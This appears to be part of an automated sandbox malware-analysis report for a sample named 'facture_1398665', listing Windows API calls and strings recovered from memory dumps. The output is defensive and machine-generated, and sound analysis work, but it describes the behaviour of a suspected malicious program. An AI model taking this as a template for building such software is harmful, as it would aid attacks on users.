    • GetTickCount.KERNEL32(?,00000000,0046AB2A), ref: 0046A8C1
    • Sleep.KERNEL32(00000014,?,00000000,0046AB2A), ref: 0046A901
      • Part of subcall function 004239B4: EnterCriticalSection.KERNEL32(?,?,004239DA,00000000,?,?,00434136,00000000,0043414C,?,00000000,?,?,00435A5E,004364EC,00000000), ref: 004239BB
      • Part of subcall function 00423A18: LeaveCriticalSection.KERNEL32(?,00423A0A,00423A12,00000000,?,?,00434136,00000000,0043414C,?,00000000,?,?,00435A5E,004364EC,00000000), ref: 00423A1C
      • Part of subcall function 00437FA4: ResetEvent.KERNEL32(?,0046AB55), ref: 00437FA8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDesktopWindow.USER32 ref: 00458BD1
    • GetDesktopWindow.USER32 ref: 00458D01
      • Part of subcall function 00465BAC: ImageList_DragMove.COMCTL32(?,?), ref: 00465BDA
      • Part of subcall function 00465C20: ImageList_EndDrag.COMCTL32(?,-0000000C,00458D31), ref: 00465C3C
    • SetCursor.USER32(00000000), ref: 00458D41
    • SetCursor.USER32(00000000), ref: 00458D56
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD294: FindFirstFileW.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D1
      • Part of subcall function 004AD294: GetLastError.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D9
      • Part of subcall function 004DF4CC: FindNextFileW.KERNEL32(000000FF,?,00000000,004DF658,?,004DF9BB,00000000,004DF9BB,00000000,004DF78E,?,00000000,?,004DF8B2,00000000,00000000), ref: 004DF634
      • Part of subcall function 004DF4CC: FindClose.KERNEL32(000000FF,004DF65F,004DF658,?,004DF9BB,00000000,004DF9BB,00000000,004DF78E,?,00000000,?,004DF8B2,00000000,00000000,?), ref: 004DF652
    • FindNextFileW.KERNEL32(000000FF,?,00000000,004DF75C,?,004DF7AC,00000000,004DF9BB,004DF9BB,00000000,004DF9BB,00000000,004DF78E,?,00000000), ref: 004DF738
    • FindClose.KERNEL32(000000FF,004DF763,004DF75C,?,004DF7AC,00000000,004DF9BB,004DF9BB,00000000,004DF9BB,00000000,004DF78E,?,00000000,?,004DF8B2), ref: 004DF756
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD294: FindFirstFileW.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D1
      • Part of subcall function 004AD294: GetLastError.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D9
      • Part of subcall function 004E2074: FindNextFileW.KERNEL32(000000FF,?,?,00000000,?,00000000,004E2252,?,00000000,00000000,?,?,004E3575,?,?,00000000), ref: 004E2120
      • Part of subcall function 004E2074: FindClose.KERNEL32(000000FF,000000FF,?,?,00000000,?,00000000,004E2252,?,00000000,00000000,?,?,004E3575,?,?), ref: 004E212D
      • Part of subcall function 004E2074: FindClose.KERNEL32(000000FF,004E222C,004E2225,?,004E2270,00000000,?,?,00000000,?,00000000,004E2252,?,00000000,00000000), ref: 004E221F
    • FindNextFileW.KERNEL32(000000FF,?,00000000,004E2225,?,004E2270,00000000,?,?,00000000,?,00000000,004E2252,?,00000000,00000000), ref: 004E2201
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004167DB
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004167F7
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0041686E
    • VariantClear.OLEAUT32(?), ref: 00416897
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
    • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
    • LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
    • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
    • LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004797F8: LoadCursorW.USER32(00000000,00007F00), ref: 00479805
      • Part of subcall function 004797F8: LoadCursorW.USER32(00000000,00000000), ref: 00479837
    • GetKeyboardLayout.USER32(00000000), ref: 00479411
    • GetDC.USER32(00000000), ref: 00479466
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00479470
    • ReleaseDC.USER32(00000000,00000000), ref: 0047947B
      • Part of subcall function 00479D8C: SystemParametersInfoW.USER32(0000001F,0000005C,?,00000000), ref: 00479DE6
      • Part of subcall function 00479D8C: CreateFontIndirectW.GDI32(0000001F), ref: 00479DF3
      • Part of subcall function 00479D8C: GetStockObject.GDI32(0000000D), ref: 00479E06
      • Part of subcall function 00479D8C: SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00479E2D
      • Part of subcall function 00479D8C: CreateFontIndirectW.GDI32(?), ref: 00479E3D
      • Part of subcall function 00479D8C: CreateFontIndirectW.GDI32(?), ref: 00479E53
      • Part of subcall function 00479D8C: CreateFontIndirectW.GDI32(?), ref: 00479E6C
      • Part of subcall function 00479D8C: GetStockObject.GDI32(0000000D), ref: 00479E8F
      • Part of subcall function 00479D8C: GetStockObject.GDI32(0000000D), ref: 00479EA3
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431F94
      • Part of subcall function 00431F8C: LeaveCriticalSection.KERNEL32(0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FA1
      • Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(?,0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FAA
      • Part of subcall function 00435C44: GetDC.USER32(00000000), ref: 00435C9A
      • Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
      • Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
      • Part of subcall function 00435C44: CreateHalftonePalette.GDI32(00000000), ref: 00435CDD
      • Part of subcall function 00435C44: ReleaseDC.USER32(00000000,00000000), ref: 00435CE8
    • CreateCompatibleDC.GDI32(00000000), ref: 004341AD
    • SelectObject.GDI32(00000000,?), ref: 004341C6
    • SelectPalette.GDI32(00000000,?,000000FF), ref: 004341EF
    • RealizePalette.GDI32(00000000), ref: 004341FB
      • Part of subcall function 00432448: LeaveCriticalSection.KERNEL32(?,00000000,0043414B,00434153,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 0043244F
      • Part of subcall function 00432448: EnterCriticalSection.KERNEL32(0050AF20,?,00000000,0043414B,00434153,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00432459
      • Part of subcall function 00432448: LeaveCriticalSection.KERNEL32(0050AF20,0050AF20,?,00000000,0043414B,00434153,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00432466
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004FA928: GetModuleHandleW.KERNEL32(user32.dll), ref: 004FA938
    • OffsetRect.USER32(00000000,?,00000000), ref: 004FAFB0
    • OffsetRect.USER32(00000000,00000000,?), ref: 004FAFCB
    • OffsetRect.USER32(00000000,?,00000000), ref: 004FAFE5
    • OffsetRect.USER32(00000000,00000000,?), ref: 004FB000
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsZoomed.USER32(00000000), ref: 0045EED5
    • GetParent.USER32(00000000), ref: 0045EEEA
    • GetWindowRect.USER32(00000000,?), ref: 0045EF03
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000016), ref: 0045EF6E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetWindow.USER32(?,00000004), ref: 0047B0A0
    • GetWindowThreadProcessId.USER32(?,?), ref: 0047B0BD
    • GetCurrentProcessId.KERNEL32(?,00000004), ref: 0047B0C9
    • IsWindowVisible.USER32(?), ref: 0047B11F
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00470A2C: IsIconic.USER32(?), ref: 00470A48
    • SetActiveWindow.USER32(?), ref: 0047BC35
      • Part of subcall function 0047B184: EnumWindows.USER32(0047B090,00000000), ref: 0047B1BB
      • Part of subcall function 0047B184: ShowWindow.USER32(?,00000000), ref: 0047B1F2
      • Part of subcall function 0047B184: ShowOwnedPopups.USER32(00000000,?), ref: 0047B221
      • Part of subcall function 0047B184: ShowWindow.USER32(?,00000005), ref: 0047B289
      • Part of subcall function 0047B184: ShowOwnedPopups.USER32(00000000,?), ref: 0047B2B8
    • IsWindowEnabled.USER32(00000000), ref: 0047BC8D
    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040), ref: 0047BCC3
    • DefWindowProcW.USER32(?,00000112,0000F020,00000000), ref: 0047BCDB
      • Part of subcall function 0047A6CC: ShowWindow.USER32(00000000,00000009), ref: 0047A6E7
      • Part of subcall function 00474F08: ShowWindow.USER32(00000000,?), ref: 00474F3E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetMenuState.USER32(?,?,?), ref: 0045334B
    • GetSubMenu.USER32(?,?), ref: 00453356
    • GetMenuItemID.USER32(?,?), ref: 0045336F
    • GetMenuStringW.USER32(?,?,?,?,?), ref: 004533C4
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MoveFileExW.KERNEL32(00000000,00000000,00000001), ref: 00480CCA
    • DeleteFileW.KERNEL32(00000000,00000000,00480D3B,?,?,?,?,00000000), ref: 00480CF1
    • GetLastError.KERNEL32(00000000,00000000,00480D3B,?,?,?,?,00000000), ref: 00480D00
    • MoveFileW.KERNEL32(00000000,00000000), ref: 00480D1A
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MulDiv.KERNEL32(F8031024,00000008,?), ref: 004FABF5
    • MulDiv.KERNEL32(E8C38B57,00000008,?), ref: 004FAC09
    • MulDiv.KERNEL32(FFF77F9E,00000008,?), ref: 004FAC1D
    • MulDiv.KERNEL32(E8C38B50,00000008,?), ref: 004FAC3B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FindResourceW.KERNEL32(00400000,?,?), ref: 00426A63
    • LoadResource.KERNEL32(00400000,00426AE8,0042178C,00400000,00000001,00000000,?,0042698E,00000000,00000000,?,00000000,?,?,004DE870,0000000A), ref: 00426A7D
    • SizeofResource.KERNEL32(00400000,00426AE8,00400000,00426AE8,0042178C,00400000,00000001,00000000,?,0042698E,00000000,00000000,?,00000000,?), ref: 00426A97
    • LockResource.KERNEL32(0042652C,00000000,00400000,00426AE8,00400000,00426AE8,0042178C,00400000,00000001,00000000,?,0042698E,00000000,00000000,?,00000000), ref: 00426AA1
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • InterlockedCompareExchange.KERNEL32(00508CC8,00000001,00000000), ref: 004122F5
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00508CC8,00000001,00000000), ref: 0041230C
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041232B
    • ResetEvent.KERNEL32(00000000), ref: 00412333
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,004B73CF), ref: 004B0A44
    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,004B73CF), ref: 004B0A4D
    • RemoveFontResourceW.GDI32(00000000), ref: 004B0A5A
    • SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004B0A6E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD73C: GetLastError.KERNEL32(00000000,004AD799), ref: 004AD77B
    • GetLastError.KERNEL32(?,00000000), ref: 004CF0EE
    Strings
    • Setting NTFS compression on file: %s, xrefs: 004CF0BB
    • Failed to set NTFS compression state (%d)., xrefs: 004CF0FF
    • Unsetting NTFS compression on file: %s, xrefs: 004CF0D3
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD73C: GetLastError.KERNEL32(00000000,004AD799), ref: 004AD77B
    • GetLastError.KERNEL32(00000000,00000000), ref: 004CE806
    Strings
    • Setting NTFS compression on directory: %s, xrefs: 004CE7D3
    • Unsetting NTFS compression on directory: %s, xrefs: 004CE7EB
    • Failed to set NTFS compression state (%d)., xrefs: 004CE817
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetWindowThreadProcessId.USER32(00000000), ref: 004589B1
    • GetCurrentProcessId.KERNEL32(00000000,?,?,00000000,00000000,00458A1C,-000000F4,?,?,004585DE,?,-0000000C,?), ref: 004589BA
    • GlobalFindAtomW.KERNEL32(00000000), ref: 004589CF
    • GetPropW.USER32(00000000,00000000), ref: 004589E6
      • Part of subcall function 0045783C: GetWindowThreadProcessId.USER32(00000000), ref: 00457842
